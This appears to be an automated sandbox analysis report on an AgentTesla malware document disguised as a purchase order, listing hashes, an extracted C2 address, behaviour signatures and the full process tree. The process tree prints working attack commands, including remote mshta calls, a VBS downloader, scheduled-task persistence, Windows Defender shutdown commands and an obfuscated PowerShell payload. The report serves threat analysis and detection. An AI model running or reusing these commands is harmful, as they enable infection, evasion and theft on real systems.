Analysis
-
max time kernel
75s -
max time network
119s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-03-2021 23:53
General
-
Target
NEW ORDER 032021-W878.ppt
-
Size
71KB
-
MD5
5c63ab7763e609cf490333be0be26596
-
SHA1
a3b5eb9fcbc36854ef61ef2c25ccf9fa5c1a5260
-
SHA256
736c4ad042343164463dce61269b4ab6101d8e34a4accbc3f2d23bb2e6a42f4a
-
SHA512
e6ed55100eac92bf698af254a6cd4b1ba0b87a1290ff5d2fd37ea6166b4444c2267c89c5d7e8d524a5250b0b33a95004d3168924f4e4b091d1b1add8c5c5a3a9
Score
10/10
Malware Config
Extracted
Family
agenttesla
C2
http://103.133.105.179/3535/inc/e93cc142f47fdc.php
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
UAC bypass 3 TTPs
-
AgentTesla Payload 2 IoCs
-
Blocklisted process makes network request 11 IoCs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 8 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 2 IoCs
-
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of WriteProcessMemory 28 IoCs
-
System policy modification 1 TTPs 2 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\NEW ORDER 032021-W878.ppt" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Microsoft Office\Root\Office16\winword.exewinword2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\MSHTA.exeMSHTA http://12384928198391823%[email protected]/dokdwkkwkdwkmmmnkdodosaskkdkwk2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\bin.vbs"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\bin.vbs" /elevate6⤵
- Checks whether UAC is enabled
- System policy modification
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/14.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im winword.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe"C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4040 -s 28843⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
-
C:\Windows\SYSTEM32\ping.exeping 127.0.0.12⤵
- Process spawned unexpected child process
- Runs ping.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableBehaviorMonitoring $true1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableBlockAtFirstSeen $true1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableScriptScanning $true1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -SubmitSamplesConsent 21⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -MAPSReporting 01⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -HighThreatDefaultAction 6 -Force1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -ModerateThreatDefaultAction 61⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -LowThreatDefaultAction 61⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -SevereThreatDefaultAction 61⤵
- Process spawned unexpected child process
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**47**$**56**$**35**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**37**$**c6**$**16**$**66**$**42**$**a3**$**d6**$**27**$**96**$**66**$**e6**$**f6**$**34**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**07**$**f6**$**47**$**35**$**a0**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**f6**$**47**$**02**$**47**$**96**$**02**$**47**$**56**$**37**$**02**$**46**$**e6**$**16**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**37**$**02**$**56**$**86**$**47**$**02**$**07**$**f6**$**47**$**37**$**02**$**32**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**46**$**27**$**f6**$**75**$**44**$**02**$**56**$**07**$**97**$**45**$**d2**$**02**$**13**$**02**$**56**$**57**$**c6**$**16**$**65**$**d2**$**02**$**22**$**56**$**27**$**16**$**77**$**97**$**07**$**35**$**96**$**47**$**e6**$**14**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**22**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**97**$**47**$**27**$**56**$**07**$**f6**$**27**$**05**$**d6**$**56**$**47**$**94**$**d2**$**47**$**56**$**35**$**a0**$**d7**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**d6**$**56**$**47**$**94**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**d6**$**56**$**47**$**94**$**d2**$**77**$**56**$**e4**$**02**$**02**$**02**$**02**$**a0**$**b7**$**02**$**92**$**92**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**86**$**47**$**16**$**05**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**47**$**37**$**56**$**45**$**82**$**12**$**82**$**02**$**66**$**96**$**a0**$**22**$**27**$**56**$**46**$**e6**$**56**$**66**$**56**$**44**$**02**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**56**$**96**$**36**$**96**$**c6**$**f6**$**05**$**c5**$**54**$**25**$**14**$**75**$**45**$**64**$**f4**$**35**$**c5**$**a3**$**d4**$**c4**$**b4**$**84**$**22**$**02**$**d3**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**a0**$**a0**$**46**$**e6**$**56**$**35**$**27**$**56**$**67**$**56**$**e4**$**02**$**47**$**e6**$**56**$**37**$**e6**$**f6**$**34**$**37**$**56**$**c6**$**07**$**d6**$**16**$**35**$**47**$**96**$**d6**$**26**$**57**$**35**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**76**$**e6**$**96**$**47**$**27**$**f6**$**07**$**56**$**25**$**35**$**05**$**14**$**d4**$**d2**$**02**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**46**$**f6**$**d4**$**47**$**96**$**46**$**57**$**14**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**b6**$**27**$**f6**$**77**$**47**$**56**$**e4**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**37**$**37**$**56**$**36**$**36**$**14**$**27**$**56**$**46**$**c6**$**f6**$**64**$**46**$**56**$**c6**$**c6**$**f6**$**27**$**47**$**e6**$**f6**$**34**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**e6**$**e6**$**16**$**36**$**35**$**47**$**07**$**96**$**27**$**36**$**35**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**27**$**f6**$**47**$**96**$**e6**$**f6**$**d4**$**56**$**d6**$**96**$**47**$**c6**$**16**$**56**$**25**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**65**$**14**$**f4**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**d6**$**56**$**47**$**37**$**97**$**35**$**e6**$**f6**$**96**$**47**$**e6**$**56**$**67**$**56**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**27**$**47**$**e6**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**47**$**56**$**35**$**a0**$**a0**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**e2**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**e2**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**47**$**56**$**74**$**02**$**d3**$**02**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**a0**$**22**$**a3**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**27**$**57**$**f6**$**95**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**a0**$**22**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**a0**$**a0**$**d7**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**02**$**02**$**02**$**02**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**22**$**02**$**a3**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**02**$**76**$**e6**$**96**$**46**$**46**$**14**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**02**$**02**$**02**$**02**$**a0**$**b7**$**a0**$**92**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**02**$**e6**$**96**$**02**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**82**$**02**$**86**$**36**$**16**$**56**$**27**$**f6**$**66**$**a0**$**a0**$**d7**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**02**$**02**$**02**$**02**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**22**$**02**$**a3**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**86**$**47**$**16**$**05**$**02**$**76**$**e6**$**96**$**46**$**46**$**14**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**02**$**02**$**02**$**02**$**a0**$**b7**$**a0**$**02**$**92**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**02**$**e6**$**96**$**02**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**82**$**02**$**86**$**36**$**16**$**56**$**27**$**f6**$**66**$**a0**$**a0**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**02**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**a0**$**a0**$**a0**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**07**$**96**$**27**$**36**$**37**$**77**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**d6**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**37**$**f6**$**86**$**e6**$**f6**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**16**$**47**$**86**$**37**$**d6**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**c6**$**56**$**86**$**37**$**27**$**56**$**77**$**f6**$**07**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**c6**$**16**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**37**$**a6**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**96**$**47**$**55**$**c6**$**c6**$**16**$**47**$**37**$**e6**$**94**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**d6**$**37**$**16**$**c6**$**96**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**37**$**56**$**27**$**47**$**67**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**37**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**f6**$**05**$**37**$**16**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**37**$**27**$**56**$**37**$**77**$**f6**$**27**$**26**$**76**$**56**$**27**$**f5**$**47**$**56**$**e6**$**07**$**37**$**16**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**c6**$**96**$**07**$**d6**$**f6**$**36**$**f5**$**47**$**56**$**e6**$**07**$**37**$**16**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**27**$**f6**$**c6**$**07**$**87**$**54**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**c5**$**93**$**13**$**33**$**03**$**33**$**e2**$**03**$**e2**$**43**$**67**$**c5**$**b6**$**27**$**f6**$**77**$**56**$**d6**$**16**$**27**$**64**$**c5**$**45**$**54**$**e4**$**e2**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**c5**$**73**$**23**$**73**$**03**$**53**$**e2**$**03**$**e2**$**23**$**67**$**c5**$**b6**$**27**$**f6**$**77**$**56**$**d6**$**16**$**27**$**64**$**c5**$**45**$**54**$**e4**$**e2**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**27**$**f6**$**c6**$**07**$**87**$**54**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**07**$**96**$**27**$**36**$**37**$**77**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**d6**$**36**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$